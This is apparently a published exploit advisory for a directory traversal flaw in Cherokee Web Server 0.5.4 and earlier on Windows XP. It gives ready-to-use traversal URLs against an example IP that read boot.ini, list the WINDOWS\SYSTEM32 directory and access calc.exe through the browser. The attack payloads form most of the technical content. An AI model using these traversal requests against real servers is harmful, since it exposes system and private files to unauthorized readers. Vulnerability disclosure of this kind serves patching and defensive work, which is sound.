1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
############################################################## Cherokee Web Server <= 0.5.4 Directory Traversal Exploit# Found By: Dr_IDE# Tested On: Windows XPSP3# Download: www.cherokee-project.com/download/windows#############################################################- Description -Cherokee Web Server <= 0.5.4 is a Windows based HTTP server. This is the latestversion of the application available.Cherokee Web Server <= 0.5.4 is vulnerable to remote directory traversal attack by thefollowing means.Default webroot is C:\Program Files\Cherokee\www [3 levels deep] adjust accordingly.- Technical Details -http://[webserver IP]/[\../]http://172.16.2.101/\../\../\../boot.inihttp://172.16.2.101/\../\../\../WINDOWS\SYSTEM32 <- Full Directory Listings through Browserhttp://172.16.2.101/\../\../\../WINDOWS\SYSTEM32\calc.exe <- File access in context of web browser instance#[pocoftheday.blogspot.com]
This page has been viewed 483 times